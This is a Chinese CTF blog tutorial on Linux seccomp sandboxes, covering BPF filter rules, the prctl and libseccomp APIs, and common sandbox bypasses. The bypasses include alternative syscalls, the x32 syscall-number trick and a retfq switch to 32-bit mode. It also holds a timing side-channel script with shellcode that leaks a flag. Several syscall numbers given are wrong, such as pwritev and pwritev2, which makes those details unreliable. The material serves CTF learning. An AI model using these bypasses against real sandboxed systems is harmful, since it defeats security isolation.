seccomp初识

ixout

2023-11-04

pwn

sandbox

c沙盒—seccomp

seccomp(全称securecomputing mode)是linux kernel支持的一种安全机制。在Linux系统里，大量的系统调用(systemcall)直接暴露给用户态程序。但是，并不是所有的系统调用都被需要，而且不安全的代码滥用系统调用会对系统造成安全威胁。通过seccomp，我们限制程序使用某些系统调用，这样可以减少系统的暴露面，同时是程序进入一种“安全”的状态。

linux中一般使用seccomp有两种方法，一种是prctl，另一种是用seccomp

ctf中使用沙箱一般都会禁用execve函数，使之无法直接getshell

seccomp函数本身会申请chunk，所以堆块结构初始会有一些不同,也就是一些师傅说的影响堆的风水

主要是seccomp_rule_add和seccomp_load这两个函数影响了tcache和fastbin的风水。

prctl则不会

Seccomp 的发展历史

2005年，Linux 2.6.12中的引入了第一个版本的seccomp，通过向/proc/PID/seccomp接口中写入“1”来启用过滤器，最初只有一个模式：严格模式（strict mode），该模式下只允许被限制的进程使用4种系统调用：read(), write(), _exit(), 和 sigreturn() ，需要注意的是，open()系统调用也是被禁止的，这就意味着在进入严格模式之前必须先打开文件。一旦为程序施加了严格模式的seccomp，对于其他的所有系统调用的调用，都会触发SIGKILL并立即终止进程。

2007年，Linux 2.6.23 内核使用prctl（）操作代替了/proc/PID/seccomp接口来施加seccomp，通过Prctl (PR_SET_SECCOMP,arg)修改调用者的seccomp模式；prctl(PR_GET_SECCOMP)用来获取seccomp的状态，返回值为0时代表进程没有被施加seccomp，但是如果进程配置了seccomp，则会由于不能调用prctl(）导致进程中止，那就没有其他返回值了？？

2012年，Linux 3.5引入了”seccomp mode 2“，为seccomp带来了一种新的模式：过滤模式（ filter mode ），该模式使用 Berkeley 包过滤器 (BPF) 程序过滤任意系统调用及其参数,使用该模式，进程可以使用 prctl (PR_SET_SECCOMP, SECCOMP_MODE_FILTER, ...)来指定允许哪些系统调用。现在已经有许多应用使用 seccomp 过滤器来对系统调用进行控制，包括 Chrome/Chromium 浏览器、OpenSSH、vsftpd 和 Firefox OS 。

2013年，Linux 3.8版本，在/proc/PID/status中添加了一个Seccomp字段，可以通过读取该文件获取对应进程的 seccomp 模式的状态（0 表示禁用，1 表示严格，2 表示过滤）。

2014年，Linux 3.17 引入了seccomp()系统调用，seccomp()在prctl()的基础上提供了现有功能的超集，增加了将进程中的所有线程同步到同一组过滤器的能力，这有助于确保即使在施加seccomp过滤器之前创建的线程仍然有效。

原理BPF

BPF即伯克利包过滤器(Berkeley Packets Filter)

BPF 定义了一个伪机器。这个伪机器可以执行代码，有一个累加器，寄存器，和赋值、算术、跳转指令。一条指令由一个定义好的结构 struct bpf_insn 表示，与真正的机器代码很相似，若干个这样的结构组成的数组，就成为 BPF 的指令序列。

以下更多介绍其在CTF沙盒中的使用

以禁用execve函数的规则为例：

struct sock_filter filter[] = {
BPF_STMT(BPF_LD+BPF_W+BPF_ABS,4), //前面两步用于检查arch
BPF_JUMP(BPF_JMP+BPF_JEQ,0xc000003e,0,2),
BPF_STMT(BPF_LD+BPF_W+BPF_ABS,0),    //将帧的偏移0处，取4个字节数据，也就是系统调用号的值载入累加器
BPF_JUMP(BPF_JMP+BPF_JEQ,59,0,1),    //当A == 59时，顺序执行下一条规则，否则跳过下一条规则，这里的59就是x64的execve系统调用
BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_KILL),     //返回KILL
BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ALLOW),    //返回ALLOW
};

在linux/filter.h中找到结构体和宏指令，BPF的过滤规则就是由两个指令宏组成的指令序列完成的，这个序列是一个结构体数组。

/*
 *    Try and keep these values and structures similar to BSD, especially
 *    the BPF code definitions which need to match so you can share filters
 */

struct sock_filter {    /* Filter block */
    __u16    code;   /* Actual filter code */
    __u8    jt;    /* Jump true */
    __u8    jf;    /* Jump false */
    __u32    k;      /* Generic multiuse field */
};

struct sock_fprog {    /* Required for SO_ATTACH_FILTER. */
    unsigned short        len;    /* Number of filter blocks */
    struct sock_filter __user *filter;
};

/* ret - BPF_K and BPF_X also apply */
#define BPF_RVAL(code)  ((code) & 0x18)
#define         BPF_A           0x10

/* misc */
#define BPF_MISCOP(code) ((code) & 0xf8)
#define         BPF_TAX         0x00
#define         BPF_TXA         0x80

/*
 * Macros for filter block array initializers.
 */
#ifndef BPF_STMT//一般执行加载指令
#define BPF_STMT(code, k) { (unsigned short)(code), 0, 0, k }
#endif
#ifndef BPF_JUMP//一般执行判断跳转和返回指令
#define BPF_JUMP(code, k, jt, jf) { (unsigned short)(code), jt, jf, k }
#endif

在linux/seccomp.h中存在用于BPF_STMT的结构体,BPF_STMT的第二个参数一般就是根据这个定

struct seccomp_data {
	int nr;//系统调用号
	__u32 arch;//架构
	__u64 instruction_pointer;
	__u64 args[6];//参数
};

在linux/bpf_common.h中有BPF_STMT和BPF_JUMP这两个操作指令参数的介绍

#define BPF_CLASS(code) ((code) & 0x07)            //首先指定操作的类别
#define        BPF_LD        0x00                                        //将操作数装入A或者X
#define        BPF_LDX        0x01                   
#define        BPF_ST        0x02                                        //拷贝A或X的值到内存
#define        BPF_STX        0x03
#define        BPF_ALU        0x04                                        //用X或常数作为操作数在累加器上执行算数或逻辑运算
#define        BPF_JMP        0x05                                        //跳转指令
#define        BPF_RET        0x06                                        //终止过滤器并表明报文的哪一部分保留下来，如果返回0，报文全部被丢弃
#define        BPF_MISC     0x07


/* ld/ldx fields */
#define BPF_SIZE(code)  ((code) & 0x18)         //在ld时指定操作数的大小
#define        BPF_W        0x00                //双字
#define        BPF_H        0x08                //单字
#define        BPF_B        0x10                //单字节



#define BPF_MODE(code)  ((code) & 0xe0)         //操作数类型
#define        BPF_IMM        0x00						  //立即数
#define        BPF_ABS        0x20                        //绝对偏移                   
#define        BPF_IND        0x40                        //相对偏移
#define        BPF_MEM        0x60
#define        BPF_LEN        0x80
#define        BPF_MSH        0xa0



/* alu/jmp fields */
#define BPF_OP(code)    ((code) & 0xf0)         //当操作码类型为ALU时，指定具体运算符
#define        BPF_ADD        0x00                    
#define        BPF_SUB        0x10
#define        BPF_MUL        0x20
#define        BPF_DIV        0x30
#define        BPF_OR        0x40
#define        BPF_AND        0x50
#define        BPF_LSH        0x60
#define        BPF_RSH        0x70
#define        BPF_NEG        0x80
#define        BPF_MOD        0x90
#define        BPF_XOR        0xa0
#define        BPF_JA        0x00                    //当操作码类型是JMP时指定跳转类型
#define        BPF_JEQ        0x10
#define        BPF_JGT        0x20
#define        BPF_JGE        0x30
#define        BPF_JSET        0x40


#define BPF_SRC(code)   ((code) & 0x08)        
#define        BPF_K        0x00                    //常数
#define        BPF_X        0x08

一条指令包含多个部分,只需要按照结构体去创建规则就可以使用它，可以有多条过滤规则，seccomp会从第0条开始逐条执行，直到遇到BPF_RET返回，决定是否允许该操作以及做某些修改。

以较为常见的指令为例:

BPF_STMT(BPF_LD+BPF_W+BPF_ABS,x)从BPF_STMT结构体的绝对偏移x处开始加载四个字节到寄存器

BPF_JUMP(BPF_JMP+BPF_JEQ,x,a,b)如果此时寄存器中的值与x相等,则跳过之后的a行代码,如果不等,则跳过之后的b行代码

此外还有对寄存器中数操作的AUL操作

当然BPF还能实现更多更高级的功能,可以深入研究

系统调用

有两个系统调用与 seccomp 有关，一个是prctl，另一个是seccomp，系统调用号分别为 157 和 317，对应的内核函数为sys_prctl和sys_seccomp：

SYSCALL_DEFINE3(seccomp, unsigned int, op, unsigned int, flags,
			 void __user *, uargs)
{
	return do_seccomp(op, flags, uargs);
}

/* Get/set process seccomp mode */
#define PR_GET_SECCOMP	21
#define PR_SET_SECCOMP	22
#define PR_SET_NO_NEW_PRIVS	38
#define PR_GET_NO_NEW_PRIVS	39

SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3,
		unsigned long, arg4, unsigned long, arg5)
{
    ...
    switch (option) {
        ...
        case PR_GET_SECCOMP:
            error = prctl_get_seccomp();
            break;
        case PR_SET_SECCOMP:
            error = prctl_set_seccomp(arg2, (char __user *)arg3);
            break;
        ...
    }
    ...
}

#define SECCOMP_MODE_DISABLED	0 /* seccomp is not in use. */
#define SECCOMP_MODE_STRICT	1 /* uses hard-coded filter. */
#define SECCOMP_MODE_FILTER	2 /* uses user-supplied filter. */

long prctl_set_seccomp(unsigned long seccomp_mode, void __user *filter)
{
	unsigned int op;
	void __user *uargs;

	switch (seccomp_mode) {
	case SECCOMP_MODE_STRICT:
		op = SECCOMP_SET_MODE_STRICT;
		/*
		 * Setting strict mode through prctl always ignored filter,
		 * so make sure it is always NULL here to pass the internal
		 * check in do_seccomp().
		 */
		uargs = NULL;
		break;
	case SECCOMP_MODE_FILTER:
		op = SECCOMP_SET_MODE_FILTER;
		uargs = filter;
		break;
	default:
		return -EINVAL;
	}

	/* prctl interface doesn't have flags, so they are always zero. */
	return do_seccomp(op, 0, uargs);
}

可以看到，如果将prctl系统调用的第一个参数设置为PR_SET_SECCOMP，最终调用的与sys_seccomp相同，都是do_seccomp。这也是设置seccomp规则的入口函数。

/* Common entry point for both prctl and syscall. */
static long do_seccomp(unsigned int op, unsigned int flags,
		       void __user *uargs)
{
	switch (op) {
	case SECCOMP_SET_MODE_STRICT:
		if (flags != 0 || uargs != NULL)
			return -EINVAL;
		return seccomp_set_mode_strict();
	case SECCOMP_SET_MODE_FILTER:
		return seccomp_set_mode_filter(flags, uargs);
	case SECCOMP_GET_ACTION_AVAIL:
		if (flags != 0)
			return -EINVAL;

		return seccomp_get_action_avail(uargs);
	case SECCOMP_GET_NOTIF_SIZES:
		if (flags != 0)
			return -EINVAL;

		return seccomp_get_notif_sizes(uargs);
	default:
		return -EINVAL;
	}
}

暂时不做分析

prctl函数实现

这个函数可以对进程进行许多操作，其中第一个参数用于指定操作,因此第一个参数的可选项非常多。

用在沙盒中,第一个参数常见的为38(PR_SET_NO_NEW_PRIVS)和22(PR_SET_SECCOMP)两种情况

38(PR_SET_NO_NEW_PRIVS)

prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);

为了保证安全性，需要将PR_SET_NO_NEW_PRIVSW位设置位1。这个操作能保证seccomp对所有用户都能起作用，并且会使子进程即execve后的进程依然受控，而且设置以后就不能再改了，即使可以调用ptctl也不能再把它禁用掉。

22(PR_SET_SECCOMP)

第二个参数为 SECCOMP_MODE_STRICT(1)时,无需使用第三个参数,此时只允许调用read/write/_exit(not exit_group)/sigreturn等少数系统调用
第二个参数为SECCOMP_MODE_FILTER(2)时,其中对syscall的限制通过参数3的结构体来自定义过滤规则

prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog);

&prog就是我们定义的过滤规则

一个例子

#include<stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>

void sandbox(){    
    struct sock_filter filter[] = {
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS,4),
    BPF_JUMP(BPF_JMP+BPF_JEQ,0xc000003e,0,2),//0xc000003e为ARCH_X86_64
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS,0),
    BPF_JUMP(BPF_JMP+BPF_JEQ,59,0,1),
    BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_KILL),
    BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = {
    .len = (unsigned short)(sizeof(filter)/sizeof(filter[0])),
    .filter = filter,
    };
    prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);
    prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog);}

int main() {
    sandbox();
    printf("start!n");
    system("id");
    return 0;
}

设置沙盒会使用到xmm寄存器,因此一些时候在程序内看到一连串看不懂的xmm寄存器相关操作,大抵是为接下来的沙盒工作

seccomp函数实现

seccomp_init对结构体进行初始化，若参数为SCMP_ACT_ALLOW，则过滤为黑名单模式；若为SCMP_ACT_KILL，则为白名单模式，即没有匹配到规则的系统调用都会杀死进程，默认不允许所有的syscall。

seccomp_rule_add用来添加一条规则，arg_cnt为0,表示我们直接限制execve,不管参数是什么，如果arg_cnt不为0,那arg_cnt表示后面限制的参数的个数,也就是只有调用execve,且参数满足要求时,才会拦截

seccomp_load是应用过滤器,如果不调用seccomp_load则上面所有的过滤都不会生效

注意：编译的时候要在最后面加 -lseccomp

一个例子

#include <unistd.h>
#include <seccomp.h>
#include <linux/seccomp.h>
void sandbox(){
	scmp_filter_ctx ctx;
    ctx = seccomp_init(SCMP_ACT_ALLOW);
    seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0);
    //......
    seccomp_load(ctx);
    }
int main(void){
    sandbox();
    char * str = "/bin/sh";
    write(1,"hello worldn",12);
    syscall(59,str,NULL,NULL);//execve
    return 0;
}

seccomp_init 返回的是一个 scmp_filter_ctx 的结构体

有效的 def_action 有下面几种

SCMP_ACT_KILL
SCMP_ACT_KILL_PROCESS
SCMP_ACT_TRAP
SCMP_ACT_ERRNO
SCMP_ACT_TRACE
SCMP_ACT_LOG
SCMP_ACT_ALLOW

其中SCMP_ACT_KILL 和 SCMP_ACT_ALLOW，一个是白名单，一个是黑名单

seccomp_rule_add可以添加规则

int seccomp_rule_add(scmp_filter_ctx ctx, uint32_t action,int syscall, unsigned int arg_cnt, ...);

arg_cnt 这个是指后面跟随的参数的个数，比如

rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 3,
                      SCMP_A0(SCMP_CMP_EQ, fd),
                      SCMP_A1(SCMP_CMP_EQ, (scmp_datum_t)buf),
                      SCMP_A2(SCMP_CMP_LE, BUF_SIZE));
rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 1,
                      SCMP_CMP(0, SCMP_CMP_EQ, fd));
rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);

分别是 3 ，1，0 个。然后后面的参数就是 comparison op,主要有下面几种

SCMP_CMP_NE
Matches when the argument value is not equal to the datum value, example:

SCMP_CMP( arg , SCMP_CMP_NE , datum )

SCMP_CMP_LT
Matches when the argument value is less than the datum value, example:

SCMP_CMP( arg , SCMP_CMP_LT , datum )

SCMP_CMP_LE
Matches when the argument value is less than or equal to the datum value, example:

SCMP_CMP( arg , SCMP_CMP_LE , datum )

SCMP_CMP_EQ
Matches when the argument value is equal to the datum value, example:

SCMP_CMP( arg , SCMP_CMP_EQ , datum )

SCMP_CMP_GE
Matches when the argument value is greater than or equal to the datum value, example:

SCMP_CMP( arg , SCMP_CMP_GE , datum )

SCMP_CMP_GT
Matches when the argument value is greater than the datum value, example:

SCMP_CMP( arg , SCMP_CMP_GT , datum )

SCMP_CMP_MASKED_EQ
Matches when the masked argument value is equal to the masked datum value, example:

SCMP_CMP( arg , SCMP_CMP_MASKED_EQ , mask , datum )

seccomp_load 其实就是应用 filter

CTF中常见的seccomp及绕过

1—禁用execve

0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x04 0xc000003e  if (A != ARCH_X86_64) goto 0006
0002: 0x20 0x00 0x00 0x00000000  A = sys_number
0003: 0x35 0x02 0x00 0x40000000  if (A >= 0x40000000) goto 0006
0004: 0x15 0x01 0x00 0x0000003b  if (A == execve) goto 0006
0005: 0x06 0x00 0x00 0x7fff0000  return ALLOW
0006: 0x06 0x00 0x00 0x00000000  return KILL

这种可以通过 open read write 来读取flag

2—禁用execve,open,write,read

0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x09 0xc000003e  if (A != ARCH_X86_64) goto 0011
0002: 0x20 0x00 0x00 0x00000000  A = sys_number
0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x06 0xffffffff  if (A != 0xffffffff) goto 0011
0005: 0x15 0x05 0x00 0x00000000  if (A == read) goto 0011
0006: 0x15 0x04 0x00 0x00000001  if (A == write) goto 0011
0007: 0x15 0x03 0x00 0x00000002  if (A == open) goto 0011
0008: 0x15 0x02 0x00 0x00000003  if (A == close) goto 0011
0009: 0x15 0x01 0x00 0x0000003b  if (A == execve) goto 0011
0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
0011: 0x06 0x00 0x00 0x00000000  return KILL

open系统调用实际上是调用了openat，所以直接调用openat，然后除了 read，write，其实还有两个

readv，和writev，这些就能绕过限制读取flag,有些连openat都禁用的可以 ptrace 修改syscall

3—禁用execve,控制open,write,read的参数

0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x0b 0xc000003e  if (A != ARCH_X86_64) goto 0013
0002: 0x20 0x00 0x00 0x00000000  A = sys_number
0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x08 0xffffffff  if (A != 0xffffffff) goto 0013
0005: 0x15 0x06 0x00 0x00000002  if (A == open) goto 0012
0006: 0x15 0x00 0x06 0x00000000  if (A != read) goto 0013
0007: 0x20 0x00 0x00 0x00000014  A = fd >> 32 # read(fd, buf, count)
0008: 0x25 0x03 0x00 0x00000000  if (A > 0x0) goto 0012
0009: 0x15 0x00 0x03 0x00000000  if (A != 0x0) goto 0013
0010: 0x20 0x00 0x00 0x00000010  A = fd # read(fd, buf, count)
0011: 0x35 0x00 0x01 0x00000004  if (A < 0x4) goto 0013
0012: 0x06 0x00 0x00 0x7fff0000  return ALLOW
0013: 0x06 0x00 0x00 0x00000000  return KILL

限制参数的,可以在参数上找关键点

4—限制sys_number

0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x07 0xc000003e  if (A != ARCH_X86_64) goto 0009
0002: 0x20 0x00 0x00 0x00000000  A = sys_number
0003: 0x15 0x05 0x00 0x00000002  if (A == open) goto 0009
0004: 0x15 0x04 0x00 0x00000009  if (A == mmap) goto 0009
0005: 0x15 0x03 0x00 0x00000065  if (A == ptrace) goto 0009
0006: 0x15 0x02 0x00 0x00000101  if (A == openat) goto 0009
0007: 0x15 0x01 0x00 0x00000130  if (A == open_by_handle_at) goto 0009
0008: 0x06 0x00 0x00 0x7fff0000  return ALLOW
0009: 0x06 0x00 0x00 0x00000000  return KILL

没有判断if (A < 0x40000000)

导致了可以 0x40000000+sys_number绕过，sys_number |= 0x40000000

同样如果没有判断if(A != ARCH_X86_64)

这个可以同32位的shellcode绕过过

一些系统调用的平替

以x86_64为例

read类

read

系统调用号:0

glibc封装:ssize_t read(int fd, void \*buf, size_t count);

使用方法:

#include<stdio.h>
char buf[64];

int main()
{
	
	int fd = open("flag", 0);
	
	pread(fd,buf,40,0);
	
	write(1,buf,40);
	
	return 0;
}

readv

系统调用号:19

glibc封装:ssize_t readv(int fd, const struct iovec *iov, int iovcnt);

使用方法:

#include<stdio.h>
#include <sys/uio.h>
char buf[64];

int main()
{
	
	int fd = open("flag", 0);
	
	struct iovec vec;
	vec.iov_base = buf;
	vec.iov_len = 64;
	
	readv(fd,&vec,1);
	
	write(1,buf,40);
	
	return 0;
}

pread64

系统调用号:17

glibc封装:ssize_t pread(int fd, void *buf, size_t count, off_t offset);

使用方法:

#include<stdio.h>
char buf[64];

int main()
{
	
	int fd = open("flag", 0);
	
	pread(fd,buf,40,0);
	
	write(1,buf,40);
	
	return 0;
}

preadv

系统调用号:295

glibc封装:ssize_t preadv(int fd, const struct iovec *iov, int iovcnt, off_t offset);

使用方法:

preadv2

系统调用号:327

glibc封装:ssize_t preadv2(int fd, const struct iovec *iov, int iovcnt, off_t offset, int flags);

使用方法:

write类

write

系统调用号:1

glibc封装:ssize_t write(int fd, const void *buf, size_t count);

使用方法:

writev

系统调用号:20

glibc封装:ssize_t writev(int fd, const struct iovec *iov, int iovcnt);

使用方法:

pwrite64

系统调用号:18

glibc封装:ssize_t pwrite(int fd, const void *buf, size_t count, off_t offset);

使用方法:

pwritev

系统调用号:327

glibc封装:ssize_t pwritev(int fd, const struct iovec *iov, int iovcnt, off_t offset);

使用方法:

pwritev2

系统调用号:327

glibc封装:ssize_t pwritev2(int fd, const struct iovec *iov, int iovcnt, off_t offset, int flags);

使用方法:

open类

open

系统调用号:2

glibc封装:int open(const char *pathname, int flags, mode_t mode);

使用方法:

openat

系统调用号:257

glibc封装:int openat(int dirfd, const char *pathname, int flags, mode_t mode);

使用方法:

dirfd：目录文件描述符。可以是一个打开的目录文件描述符，或者以下特殊值之一：

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    if (argc != 3) {
        fprintf(stderr, "Usage: %s <dir> <file>\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    const char *dir = argv[1];
    const char *file = argv[2];

    // 打开目录
    int dirfd = open(dir, O_RDONLY | O_DIRECTORY);
    if (dirfd == -1) {
        perror("open");
        exit(EXIT_FAILURE);
    }

    // 使用 openat 在目录中打开文件
    int fd = openat(dirfd, file, O_RDONLY);
    if (fd == -1) {
        perror("openat");
        close(dirfd);
        exit(EXIT_FAILURE);
    }

    printf("File %s opened successfully\n", file);

    // 关闭文件和目录文件描述符
    close(fd);
    close(dirfd);

    return 0;
}

openat2

linux5.6新增加的一个系统调用,相当于openat的增强

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <openat2.h>

int openat2(int dirfd, const char *pathname,
            struct open_how *how, size_t size);

asm(shellcraft.openat2(-100,flag_addr,flag_addr+0x40,0x40))

一些禁用绕过

如果所有read都被禁用

mmap直接映射文件到内存绕过

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <filename>\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    const char *filename = argv[1];

    // 打开文件
    int fd = open(filename, O_RDONLY);
    if (fd == -1) {
        perror("open");
        exit(EXIT_FAILURE);
    }

    // 获取文件大小
    struct stat sb;
    if (fstat(fd, &sb) == -1) {
        perror("fstat");
        exit(EXIT_FAILURE);
    }

    // 将文件映射到内存
    char *mapped = mmap(NULL, sb.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
    if (mapped == MAP_FAILED) {
        perror("mmap");
        exit(EXIT_FAILURE);
    }

    // 关闭文件描述符
    close(fd);

    // 打印映射的文件内容
    write(STDOUT_FILENO, mapped, sb.st_size);

    // 解除映射
    if (munmap(mapped, sb.st_size) == -1) {
        perror("munmap");
        exit(EXIT_FAILURE);
    }

    return 0;
}

如果read的第一个参数被限制为0/1/2

通过close关闭对应fd,再open文件

sendfile系统调用

sendfile系统调用相当于read和write的集合体

1	ssize_t sendfile(int out_fd, int in_fd, off_t *offset, size_t count);

int out_fd:输出文件描述符

int in_fd:输入文件描述符

off_t offset:指向一个 off_t 类型的指针，用于指定从输入文件描述符读取数据的起始位置。如果该指针为 NULL，则从当前文件偏移量开始读取。如果它指向的值不为 NULL，则读取后，该值会被更新到新的偏移量。

size_t count:要发送的数据字节数

无write爆破

如若所有可用的write方式都被禁用

那么可以使用侧信道的方法来逐个爆破flag

def pwn():
    global s
    flag = ''
    count = 1
    for i in range(len(flag), 0x50):
        left = 32
        right = 127
        while left < right:
            s = process('./ezshell')
            # s = remote('node2.hackingfor.fun', 38235)
            getshellcode()
            mid = (left + right) >> 1
            orw_shellcode = f'''
                mov rdi, 0x67616c662f2e
                push rdi
                mov rdi, rsp
                mov rsi, 0
                mov rdx, 0
                mov rax, 2
                syscall
                mov rdi, 3
                mov rsi, rsp
                mov rdx, 0x100
                mov rax, 0
                syscall
                mov dl, byte ptr [rsp+{i}]
                mov cl, {mid}
                cmp dl, cl
                ja loop
                ret
                loop:
                jmp loop
            '''
            s.sendline(asm(orw_shellcode))
            start_time = time.time()
            try:
                s.recv(timeout=0.2)
                if(time.time() - start_time > 0.1):
                    left = mid + 1
            except:
                right = mid
            s.close()
            log.info('time-->' + str(count))
            log.info(flag)
            count += 1
        flag += chr(left)
        log.info(flag)
        if(flag[-1] == '}'):
            break

改变cs寄存器绕过

retf/retfq是一条远转移指令，等价于pop cs; pop ip，这条指令一般来说可以在libc中找到，但为什么它能修改程序的模式呢，实际上是因为它修改了cs段寄存器。

cs寄存器即code segment寄存器，指向存放代码的内存段，在8086的实模式下，指令的寻址为cs:ip->cs *16 + ip。在32位保护模式下，cpu地址总线和通用寄存器都达到了32位，可以直接访问4GB的内存，段寄存器被赋予了新的任务：保存段描述符的索引即段选择符(segment descriptor)

                +--------------------------------------+
                |         index                 |T|    |
                |                               |I|RPL |
                +--------------------------------^--^--+
                                                 |  |
                   Table indicator+--------------+  |
                     0 GDT                          |
                     1 LDT                          |
                  Request Privilege Level+----------+

段选择符的低两位用来表示特权级0-3，第3位表示对应的描述符是位于GDT or LDT，高15位则是下标。在段描述符里，保存有更多的该段的参数信息，包括段基址、粒度、属性、模式等等，

以64为模式切换到32位模式为例，为了实现模式的切换，我们需要找到一个合适的段选择符，它指向GDT中的一个32位的段描述符。

在linux x86_x64中，0x23是一个32位的代码段选择符（位于GDT），0x33是一个64位长模式的代码段选择符。所以在模式切换时，只需用retf/retfq指令将cs寄存器的值由0x33改为0x23即可。

另外需要注意的是，由于程序从64位切换到了32位，所以各个通用寄存器的使用发生了变化，从原来的8字节变成了只使用低4字节，特别对于栈寄存器esp来说，它是rsp的低4字节，原先的rsp保存着可以被正常访问的栈地址，但这个地址的低4字节大概率为一个不可访问的地址，所以在执行retf/retfq之前，还需要进行栈迁移，只要通过rop控制rbp后进行两次连续的leave指令就可以实现。

在Linux中，除了FS、GS需要设置段基址用于访问TLS之外，其余的段寄存器对应的段描述符中的段基址都被置为了0，也就是直接使用偏移作为内存访问的绝对地址，所以只要控制好指令指针寄存器，模式切换时就不会出现控制流的失控。

socket绕过write

如果靶机是向外通网的可以通过一些socket系统调用绕过write的限制

发送:sendto,sendmsg,sendmmsg
接收:recvfrom,recvmsg,recvmmsg

其中sendto可以直接发送数据,剩余两个需要发送msg消息

mprotect替代

pkey_mprotect可以达到mprotect差不多的效果

不过这个需要cpu支持